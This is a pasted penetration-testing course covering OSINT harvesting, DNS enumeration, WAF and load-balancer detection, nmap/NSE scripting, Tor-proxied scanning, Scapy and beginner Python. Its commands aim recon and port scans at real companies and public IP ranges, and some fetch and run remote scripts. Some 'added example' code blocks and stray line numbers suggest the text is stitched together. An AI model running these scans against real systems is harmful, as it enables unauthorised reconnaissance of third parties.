Untitled
djtroby, May 31st, 2017
##################################
# Scripting For InfoSec Pros     #
# By Joe McCray                  #
##################################


##########
# VMWare #
##########
- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.


##########################
# Download the attack VM #
##########################
https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts


Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


#########################################
# Boot up the StrategicSec Ubuntu host  #
# You can also boot up the Win7 as well #
#########################################

- Log in to your Ubuntu host with the following credentials:
    user: strategicsec
    pass: strategicsec


- I prefer to use Putty to SSH into my Ubuntu host on pentests, and I'll be teaching this class in the same manner that I do pentests.
- You can download Putty from here:
  http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


- For the purpose of this workshop, 192.168.230.128 is my Ubuntu IP address, so any time you see that IP you'll know that's my Ubuntu host.


Email Harvesting
----------------

cd ~/toolz/

rm -rf theharvester-read-only/

sudo apt install -y python-pyasn1 python-pyasn1-modules git vim nmap openssh-server proxychains git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev
     strategicsec                <--- the sudo password; the same prompt follows every sudo command below

pip install requests

git clone https://github.com/laramies/theHarvester.git

cd theHarvester/

python theHarvester.py

python theHarvester.py -d motorola.com -l 50 -b google

python theHarvester.py -d motorola.com -l 50 -b bing

python theHarvester.py -d motorola.com -l 50 -b linkedin

python theHarvester.py -d motorola.com -l 50 -b pgp



File Meta-Data Harvesting
-------------------------
cd ~/toolz/

sudo apt-get install -y python-pip
     strategicsec

pip install --upgrade pip

pip install google


git clone https://github.com/opsdisk/metagoofil.git

cd metagoofil/


python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles

sudo apt install libimage-exiftool-perl
     strategicsec

cd motorolafiles

exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u



python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
Where:

-d : I used another domain name aside from Google.com to make it work
-t : I asked the program to search for two types of public documents, which are doc and pdf files
-l : I limited the search results to 100 to make the process faster
-n : I limited the downloads (files that are going to be downloaded to get their metadata extracted) to only 3 to make the process faster
-o : I directed the result of the compilation to motorolafiles, which is located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
-f : Save the html links to an html_links_<TIMESTAMP>.txt file



Github Info Harvesting
----------------------
cd ~/toolz/

sudo pip install gitem
     strategicsec


gitem organization facebook


gitem repository facebook react


gitem --processes 4 user zpao

You'll probably get a message that says "Your API requests are being rate-limited"


You can create an OAuth token using the link below:
Reference:
https://help.github.com/articles/creating-an-access-token-for-command-line-use/


gitem -o 123f45672972c18ea0f42fc70bc8c5172b96d890 --processes 4 user zpao
You'll have to use your own OAuth token



Network Topology Enumeration
----------------------------

cd ~/toolz/

wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py

python gxfr.py --bxfr --dns-lookup -o
    motorola.com
    [ press enter ]
    cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=



cd ~/toolz/

wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl

chmod +x blindcrawl.pl

perl blindcrawl.pl -d motorola.com



rm -rf fierce2/

git clone https://github.com/mschwager/fierce.git

cd fierce

sudo apt-get install -y python3-pip
    strategicsec

sudo pip3 install -r requirements.txt

python3 fierce.py -h

python3 fierce.py --domain motorola.com --subdomains accounts admin ads

Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:

python3 fierce.py --domain facebook.com --subdomains admin --traverse 10


Limit nearby IP traversal to certain domains with the --search flag:

python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net


Attempt an HTTP connection on domains discovered with the --connect flag:

python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
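To make the --traverse and --search behaviour concrete, here is an added example (not fierce's own code) that computes the neighbouring addresses a --traverse N sweep would look at and applies the --search domain filter to the names they resolve to. The discovered hosts and the reverse-lookup answers are constructed sample data, and the "stay inside the /24" boundary is an assumption of this example.

```python
"""Added example, not fierce's code: the neighbour sweep behind --traverse N
and the domain filter behind --search, run over constructed data so it works
offline. DISCOVERED stands in for the subdomain brute-force results and
FAKE_PTR for the reverse (PTR) answers on neighbouring addresses."""
import ipaddress

# Constructed sample data: hostname -> IPv4 found by the subdomain scan.
DISCOVERED = {
    "admin.example.com": "203.0.113.40",
    "mail.example.com": "203.0.113.41",
    "www.example.com": "198.51.100.10",
}

# Constructed stand-in for the reverse lookups fierce would issue.
FAKE_PTR = {
    "203.0.113.38": "vpn.example.com",
    "203.0.113.39": "git.example.net",
    "203.0.113.42": "cdn.thirdparty.net",
    "198.51.100.12": "www2.example.com",
}


def traverse_candidates(ip, distance):
    """Addresses within `distance` of ip on either side, like --traverse N.
    Assumption of this example: stay inside the /24 of the discovered host,
    and never re-check the host itself."""
    addr = ipaddress.ip_address(ip)
    net = ipaddress.ip_network(f"{ip}/24", strict=False)
    out = []
    for offset in range(-distance, distance + 1):
        if offset == 0:
            continue
        cand = addr + offset
        if cand in net:
            out.append(str(cand))
    return out


def in_search_scope(name, domain, search_domains):
    """--search semantics: keep a name only if it is the base domain, one of the
    extra search domains, or a subdomain of either (so a third party CDN that
    happens to sit next door is dropped)."""
    scope = [domain] + list(search_domains)
    return any(name == d or name.endswith("." + d) for d in scope)


def traverse(discovered, domain, distance, search_domains=(), resolver=FAKE_PTR):
    """Sweep the neighbours of every discovered address and return the new
    (ip, hostname) pairs that survive the search filter, ordered by address."""
    found = {}
    seen_ips = set(discovered.values())
    for ip in sorted(seen_ips, key=ipaddress.ip_address):
        for cand in traverse_candidates(ip, distance):
            if cand in seen_ips or cand in found:
                continue
            name = resolver.get(cand)  # a real tool would do a PTR query here
            if name and in_search_scope(name, domain, search_domains):
                found[cand] = name
    return sorted(found.items(), key=lambda kv: ipaddress.ip_address(kv[0]))


if __name__ == "__main__":
    # Equivalent of: --domain example.com --traverse 2 --search example.net
    for ip, name in traverse(DISCOVERED, "example.com", 2, ["example.net"]):
        print(f"{ip:16} {name}")
```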





Another good way to find servers
--------------------------------
cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

./ipcrawl 148.87.1.1 148.87.1.254               (DNS forward lookup against an IP range)




Check for Load Balancers
------------------------
Here are some command-line options to use for identifying load balancers:

dig microsoft.com

cd ~/toolz
wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh
chmod +x lbd.sh
./lbd.sh microsoft.com


git clone https://github.com/jmbr/halberd.git
cd halberd
sudo python setup.py install
     strategicsec
halberd microsoft.com
halberd motorola.com
halberd oracle.com
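The signals lbd and halberd look for (more than one A record for the name, back-end clocks that disagree, and response headers that change between identical requests) re-implemented as an added example over constructed data; this is not the tools' own code, and the A records and header sets below are made up for the demonstration.

```python
"""Added example, not lbd or halberd code: the DNS and HTTP indicators those
tools use to spot a load balancer, evaluated over constructed data so the
logic can be read and run offline."""
from email.utils import parsedate_to_datetime

# Constructed sample data: what `dig` and a few identical HTTP requests might return.
A_RECORDS = ["198.51.100.10", "198.51.100.11", "198.51.100.12"]
RESPONSES = [
    {"Server": "nginx/1.10.3", "Date": "Wed, 31 May 2017 10:00:01 GMT", "X-Node": "web1"},
    {"Server": "nginx/1.10.3", "Date": "Wed, 31 May 2017 09:59:58 GMT", "X-Node": "web2"},
    {"Server": "nginx/1.10.3", "Date": "Wed, 31 May 2017 10:00:03 GMT", "X-Node": "web1"},
    {"Server": "nginx/1.10.2", "Date": "Wed, 31 May 2017 10:00:02 GMT", "X-Node": "web3"},
]

# Headers that legitimately change per request and therefore prove nothing.
VOLATILE_HEADERS = {"Date", "Set-Cookie", "ETag", "Expires", "Content-Length"}


def dns_load_balanced(a_records):
    """DNS round-robin: the name resolves to more than one distinct address."""
    return len(set(a_records)) > 1


def date_header_goes_backwards(responses):
    """Clock-skew check: the responses were fetched in order, so a Date header
    earlier than its predecessor means a different back-end answered."""
    stamps = [parsedate_to_datetime(r["Date"]) for r in responses if "Date" in r]
    return any(later < earlier for earlier, later in zip(stamps, stamps[1:]))


def differing_headers(responses, ignore=VOLATILE_HEADERS):
    """Header names whose values vary across identical requests, once the
    per-request noise in `ignore` is set aside; each one is evidence of
    more than one back-end behind the name."""
    names = set().union(*(r.keys() for r in responses)) - ignore
    return sorted(n for n in names if len({r.get(n) for r in responses}) > 1)


def load_balancer_report(a_records, responses):
    """Combine the three indicators the way a tester reads lbd's output."""
    dns = dns_load_balanced(a_records)
    date = date_header_goes_backwards(responses)
    headers = differing_headers(responses)
    return {
        "dns": dns,
        "date": date,
        "headers": headers,
        "likely_load_balanced": dns or date or bool(headers),
    }


if __name__ == "__main__":
    for key, value in load_balancer_report(A_RECORDS, RESPONSES).items():
        print(f"{key:22} {value}")
```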



Test for Web Application Firewalls (WAFs)
-----------------------------------------
pip install wafw00f

wafw00f http://strategicsec.com

wafw00f http://oracle.com


sudo nmap -p 80 --script http-waf-detect.nse strategicsec.com
     strategicsec


sudo nmap -p 80 --script http-waf-detect.nse oracle.com
     strategicsec




Recon-NG (Metasploit for Recon):
--------------------------------
cd ~/toolz/

sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
    strategicsec

sudo pip install dicttoxml
    strategicsec



git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
pip install PyPDF2
sudo pip install olefile
    strategicsec
./recon-ng



At the prompt, let's type help in order to look at the commands we can use in Recon-ng.

recon-ng > help


Note that many of these commands are nearly identical to Metasploit, including back, set, use, search, show, and unset.

recon-ng > [ TAB ] [ TAB ]



To see all the modules in Recon-ng, we can type:

recon-ng > show [ TAB ] [ TAB ]



Ok, let's drive this thing....

recon-ng > show banner

recon-ng > show companies

recon-ng > show contacts

recon-ng > show credentials

recon-ng > show dashboard

recon-ng > show domains

recon-ng > show hosts

recon-ng > show keys

recon-ng > show leaks

recon-ng > show locations

recon-ng > show modules

recon-ng > show netblocks

recon-ng > show options

recon-ng > show ports

recon-ng > show profiles

recon-ng > show pushpins

recon-ng > show repositories

recon-ng > show schema

recon-ng > show vulnerabilities

recon-ng > show workspaces



When you have found a module that you would like to try, the process is fairly straightforward.

Type "use [Modulename]" to use the module

Type "show info" to view information about the module

And then "show options" to see what variables can be set

Set the option variables with "set [variable]"

Finally, type "run" to execute the module


********************************** Begin Day 1 Homework Part 1 **********************************
NOTE: Take screenshots of yourself performing all of the commands we've learned so far


You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx).

You must spell your name EXACTLY as you want it spelled on your class certificate.

IMPORTANT NOTE:
Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST.


********************************** End Day 1 Homework Part 1 **********************************



********************************** Begin Day 1 Homework Part 2 **********************************
NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS


You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.


You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Recon-NG.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Recon-NG.docx).

You must spell your name EXACTLY as you want it spelled on your class certificate.


Reference links:
http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/

IMPORTANT NOTE:
Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST.

********************************** End Day 1 Homework Part 2 **********************************




########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*
     strategicsec

    - if -sP yields no results, try:
sudo nmap -sL 157.166.226.*
     strategicsec

- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247
     strategicsec


- Bannergrab/Version Query
What versions of software are running?
--------------------------------------
sudo nmap -sV 162.243.126.247
     strategicsec


- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/



#######################################################
# Day 1: 3rd Party Scanning, and scanning via proxies #
#######################################################

https://www.shodan.io/

    Create a FREE account and login

    net:129.188.8.0/24



cd /home/strategicsec/toolz/
perl proxyfinder-0.3.pl multiproxy 3 proxies.txt    <-- This takes a long time to run



sudo vi /etc/proxychains.conf               <--- Make sure that the last line of the file is: socks4  127.0.0.1 9050
     strategicsec




----------------------------------------------------------------------
vi ~/toolz/fix-proxychains-dns.sh

#!/bin/bash
# This script is called by proxychains to resolve DNS names
# DNS server used to resolve names
# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
DNS_SERVER=4.2.2.2

if [ $# = 0 ] ; then
    echo " usage:"
    echo " proxyresolv <hostname> "
    exit
fi

# Preload the proxychains library so the TCP query to the DNS server goes through the proxy chain
export LD_PRELOAD=libproxychains.so.3
# Force a TCP query (UDP cannot be proxied) and print only the address from the A record line
dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
-----------------------------------------------------------------------


sudo ntpdate pool.ntp.org
     strategicsec

tor-resolve strategicsec.com

proxychains nmap -sT -p80 162.243.126.247

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247




#########################
# Playing with Nmap NSE #
#########################

nmap -Pn -p80 --script ip-geolocation-* strategicsec.com

nmap -p80 --script dns-brute strategicsec.com

nmap --script http-robtex-reverse-ip secore.info

nmap -Pn -p80 --script=http-headers strategicsec.com


ls /usr/share/nmap/scripts | grep http
nmap -Pn -p80 --script=http-* strategicsec.com


############
# Nmap NSE #
############

- Reference for this tutorial is:
https://thesprawl.org/research/writing-nse-scripts-for-vulnerability-scanning/

----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse
     strategicsec


-- The Head Section --
-- The Rule Section --
portrule = function(host, port)
    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end

-- The Action Section --
action = function(host, port)
    return "I love Linux!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443



----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)
    return "I still love Linux!"
end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443



OK, now let's have some fun with my buddy Carlos Perez's website, which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working.

----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        return response.body
    end

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end

end
----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



----------------------------------------------------------------------
sudo vi /usr/share/nmap/scripts/intro-nse.nse

-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
action = function(host, port)

    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)

    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")

        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end

----------------------------------------------------------------------

- Ok, now that we've made that change let's run the script
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443



####################
# Installing Scapy #
####################

sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot python-pycryptopp python-pycryptopp-dbg python-crypto python-crypto-dbg python-cryptography


- Reference Page For All Of The Commands We Will Be Running:
http://samsclass.info/124/proj11/proj17-scapy.html



- To run Scapy interactively

    sudo scapy



#####################################
# Sending ICMPv4 Packets with scapy #
#####################################

- In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:

    i = IP()


- This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:

    i.display()


- Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:

    i.dst="192.168.54.184"

    i.display()


- Notice that scapy automatically fills in your machine's source IP address.

- Use these commands to create an object named ic of type ICMP and display its properties:

    ic = ICMP()

    ic.display()


- Use this command to send the packet onto the network and listen for a single packet in response. Note that the third character is the numeral 1, not a lowercase L:

    sr1(i/ic)


- This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4.

- The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.

- Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):

    sr1(i/ic/"YOUR NAME")


- You should see a reply with a Raw section containing your name.
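To see what the i/ic/"YOUR NAME" layering actually puts on the wire, here is an added example (not course material or Scapy code) that hand-assembles the IPv4 header, the ICMP echo request and the Raw payload with their checksums, then parses the bytes back into the three layers scapy displays. It needs no root and no network; the source and destination addresses are the sample ones from this lesson.

```python
"""Added example, not from the course or Scapy: build the bytes behind
sr1(i/ic/"YOUR NAME") by hand (IPv4 header + ICMP echo request + payload)
and parse them back, so the layer boundaries and checksums can be inspected
offline. Addresses are the lesson's sample values, not real targets."""
import struct

ICMP_PROTO = 1          # IP protocol number for ICMP
ICMP_ECHO_REQUEST = 8   # ICMP type that scapy's ICMP() defaults to


def inet_checksum(data):
    """RFC 1071 one's-complement sum used by both the IP and ICMP headers.
    A buffer that already contains a valid checksum sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_to_bytes(dotted):
    return bytes(int(octet) for octet in dotted.split("."))


def build_icmp_echo(payload=b"", ident=1, seq=1):
    """ICMP echo request: type 8, code 0, checksum over header + payload.
    The payload is what scapy shows as the Raw layer."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def build_ipv4(src, dst, proto, payload, ttl=64, ident=1):
    """Minimal 20-byte IPv4 header (version 4, IHL 5, no options) in front of payload."""
    total_len = 20 + len(payload)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, 0, ttl, proto, 0,
                         ip_to_bytes(src), ip_to_bytes(dst))
    csum = inet_checksum(header)            # computed with the checksum field zeroed
    header = header[:10] + struct.pack("!H", csum) + header[12:]
    return header + payload


def parse_packet(raw):
    """Split a raw IPv4 packet into the layers scapy prints: IP, ICMP, Raw.
    Both checksums are verified so a corrupted capture is flagged, not trusted."""
    ver_ihl = raw[0]
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(raw) < ihl:
        raise ValueError("not an IPv4 packet")
    total_len = struct.unpack("!H", raw[2:4])[0]
    ip = {
        "src": ".".join(str(b) for b in raw[12:16]),
        "dst": ".".join(str(b) for b in raw[16:20]),
        "ttl": raw[8],
        "proto": raw[9],
        "len": total_len,
        "checksum_ok": inet_checksum(raw[:ihl]) == 0,
    }
    body = raw[ihl:total_len]
    if ip["proto"] != ICMP_PROTO or len(body) < 8:
        return {"ip": ip, "icmp": None, "raw": body}
    itype, code, _, ident, seq = struct.unpack("!BBHHH", body[:8])
    icmp = {"type": itype, "code": code, "id": ident, "seq": seq,
            "checksum_ok": inet_checksum(body) == 0}
    return {"ip": ip, "icmp": icmp, "raw": body[8:]}


if __name__ == "__main__":
    # Same layering as i/ic/"YOUR NAME" with i.dst = "192.168.54.184"
    pkt = build_ipv4("192.168.230.128", "192.168.54.184", ICMP_PROTO,
                     build_icmp_echo(b"YOUR NAME"))
    print(pkt.hex())
    for layer, fields in parse_packet(pkt).items():
        print("###[ %s ]###" % layer, fields)
```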
  802.  
  803.  
  804.  
  805. ###################################
  806. # Sending a UDP Packet with Scapy #
  807. ###################################
  808.  
  809.  
  810. - Preparing the Target
  811. $ ncat -ulvp 4444
  812.  
  813.  
  814.  
  815.  
  816. --open another terminal--
  817. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  818.  
  819.     u = UDP()
  820.  
  821.     u.display()
  822.  
  823.  
  824.  
  825. - This creates an object named u of type UDP, and displays its properties.
  826.  
  827. - Execute these commands to change the destination port to 4444 and display the properties again:
  828.  
  829.     i.dst="192.168.54.184"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  830.  
  831.     u.dport = 4444
  832.  
  833.     u.display()
  834.  
  835.  
  836.  
  837. - Execute this command to send the packet to the Windows machine:
  838.  
  839.     send(i/u/"YOUR NAME SENT VIA UDP\n")
  840.  
  841.  
  842.  
  843. - On the Windows target, you should see the message appear
  844.  
  845.  
  846. p = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="strategicsec.com")))
  847.  
  848.  
  849. p=sr(IP(dst="192.168.230.2")/TCP(dport=[23,80,53,443]))
  850.  
  851.  
  852. p=sr(IP(dst="192.168.230.2")/TCP(dport=[80]))
  853.  
  854.  
  855. traceroute (["strategicsec.com"], maxttl=20)
  856.     This is actually an ICMP & TCP traceroute, default destination is port 80
  857.  
  858.  
  859. traceroute (["strategicsec.com"], dport=443, maxttl=20)
  860.  
  861.  
  862.  
  863. ############################
  864. # Ping Sweeping with Scapy #
  865. ############################
  866.  
  867. ----------------------------------------------------------------------
  868. vi scapy-pingsweep.py
  869.  
  870.  
  871. #!/usr/bin/python
  872. from scapy.all import *
  873.  
  874. TIMEOUT = 2
  875. conf.verb = 0
  876. for ip in range(0, 256):
  877.     packet = IP(dst="192.168.1." + str(ip), ttl=20)/ICMP()
  878.     reply = sr1(packet, timeout=TIMEOUT)
  879.     if not (reply is None):
  880.          print reply.dst, "is online"
  881.     else:
  882.          print "Timeout waiting for %s" % packet[IP].dst
  883. ----------------------------------------------------------------------
  884.  
  885.  
  886. ###############################################
  887. # Checking out some scapy based port scanners #
  888. ###############################################
  889.  
  890. wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
  891.  
  892. cat rdp_scan.py
  893.  
  894. sudo python rdp_scan.py 192.168.1.250
  895.  
  896.  
  897. #########################################
  898. # Here is the courseware for this month #
  899. #########################################
  900.  
  901. Class powerpoint slides:
  902. https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx
  903.  
  904.  
  905.  
  906. Courseware Lab Manual
  907. https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf
  908.  
  909.  
  910.  
  911. https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
  912. user:      infosecaddicts
  913. pass:      infosecaddicts
  914.  
  915.  
  916. The youtube video playlist that I'd like for you to watch is located here:
  917. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  918.  
  919.  
  920. ####################
  921. # Installing Python#
  922. ####################
  923. Windows
  924. 32-Bit Version
  925. http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
  926.  
  927. 64-Bit Version
  928. http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi
  929.  
  930. After you install Python in Windows the next thing you may want to install is IdleX:
  931. http://idlex.sourceforge.net/features.html
  932.  
  933.  
  934. Linux
  935. Debian/Ubuntu:      sudo apt-get install -y python
  936. RHEL/CentOS/Fedora: sudo yum install -y python
  937.  
  938. After you install Python in Linux the next thing that you will need to do is install idle.
  939.  
  940. sudo apt-get install -y idle
  941.  
  942. Open IDLE, and let's just dive right in.
  943.  
  944.  
  945.  
  946.  
  947. #############################
  948. # Lesson 1: Simple Printing #
  949. #############################
  950.  
  951. >>> print "Today we are learning Python."
  952.  
  953.  
  954.  
  955.  
  956.  
  957.  
  958. #####################################
  959. # Lesson 2: Simple Numbers and Math #
  960. #####################################
  961.  
  962. >>> 2+2
  963.  
  964. >>> 6-3
  965.  
  966. >>> 18/7
  967.  
  968. >>> 18.0/7
  969.  
  970. >>> 18.0/7.0
  971.  
  972. >>> 18/7
  973.  
  974. >>> 9%4
  975.  
  976. >>> 8%4
  977.  
  978. >>> 8.75%.5
  979.  
  980. >>> 6.*7
  981.  
  982. >>> 6*6*6
  983.  
  984. >>> 6**3
  985.  
  986. >>> 5**12
  987.  
  988. >>> -5**4
  989.  
  990.  
  991.  
  992.  
  993.  
  994.  
  995. #######################
  996. # Lesson 3: Variables #
  997. #######################
  998.  
  999. >>> x=18
  1000.  
  1001. >>> x+15
  1002.  
  1003. >>> x**3
  1004.  
  1005. >>> y=54
  1006.  
  1007. >>> x+y
  1008.  
  1009. >>> g=input("Enter number here: ")
  1010.     43
  1011.  
  1012. >>> g+32
  1013.  
  1014. >>> g**3
  1015.  
  1016.  
  1017.  
  1018.  
  1019.  
  1020.  
  1021.  
  1022.  
  1023. ###################################
  1024. # Lesson 4: Modules and Functions #
  1025. ###################################
  1026.  
  1027. >>> 5**4
  1028.  
  1029. >>> pow(5,4)
  1030.  
  1031. >>> abs(-18)
  1032.  
  1033. >>> abs(5)
  1034.  
  1035. >>> floor(18.7)
  1036.  
  1037. >>> import math
  1038.  
  1039. >>> math.floor(18.7)
  1040.  
  1041. >>> math.sqrt(81)
  1042.  
  1043. >>> joe = math.sqrt
  1044.  
  1045. >>> joe(9)
  1046.  
  1047. >>> joe=math.floor
  1048.  
  1049. >>> joe(19.8)
  1050.  
  1051.  
  1052.  
  1053.  
  1054.  
  1055.  
  1056.  
  1057. ##################################
  1058. # Lesson 5: How to Save Programs #
  1059. ##################################
  1060. Run "IDLE (Python GUI)"
  1061.  
  1062. File -> New Window
  1063.  
  1064. print "Python for InfoSec"
  1065.  
  1066. File -> Save as
  1067.     py4InfoSec.py
  1068.  
  1069. Run -> Run Module or Press "F5"
  1070.  
  1071.  
  1072.  
  1073.  
  1074.  
  1075. Create a file name.py
  1076.  
  1077. x = raw_input("Enter name: ")
  1078. print "Hey " + x
  1079. raw_input("Press<enter>")
  1080.  
  1081.  
  1082. Run -> Run Module or Press "F5"
  1083.  
  1084.  
  1085.  
  1086.  
  1087.  
  1088.  
  1089.  
  1090.  
  1091. #####################
  1092. # Lesson 6: Strings #
  1093. #####################
  1094.  
  1095. >>> "XSS"
  1096.  
  1097. >>> 'SQLi'
  1098.  
  1099. >>> "Joe's a python lover"
  1100.  
  1101. >>> 'Joe\'s a python lover'
  1102.  
  1103. >>> "Joe said \"InfoSec is fun\" to me"
  1104.  
  1105. >>> a = "Joe"
  1106.  
  1107. >>> b = "McCray"
  1108.  
  1109. >>> a, b
  1110.  
  1111. >>> a+b
  1112.  
  1113.  
  1114.  
  1115.  
  1116.  
  1117.  
  1118.  
  1119.  
  1120. ##########################
  1121. # Lesson 7: More Strings #
  1122. ##########################
  1123.  
  1124. >>> num = 10
  1125.  
  1126. >>> num + 2
  1127.  
  1128. >>> "The number of open ports found on this system is " + num
  1129.  
  1130. >>> num = str(18)
  1131.  
  1132. >>> "There are " + num + " vulnerabilities found in this environment."
  1133.  
  1134. >>> num2 = 46
  1135.  
  1136. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
  1137.  
  1138.  
  1139.  
  1140.  
  1141.  
  1142.  
  1143.  
  1144.  
#######################
# Lesson 8: Raw Input #
#######################
Run "IDLE (Python GUI)"

File -> New Window

joemccray=input("Enter name: ")
print joemccray



Run -> Run Module               # Will throw an error
    or
Press "F5"

File -> New Window
joemccray=raw_input("Enter name: ")
print joemccray

Run -> Run Module               # Works this time: raw_input() hands back the typed text as a string

    or

Press "F5"

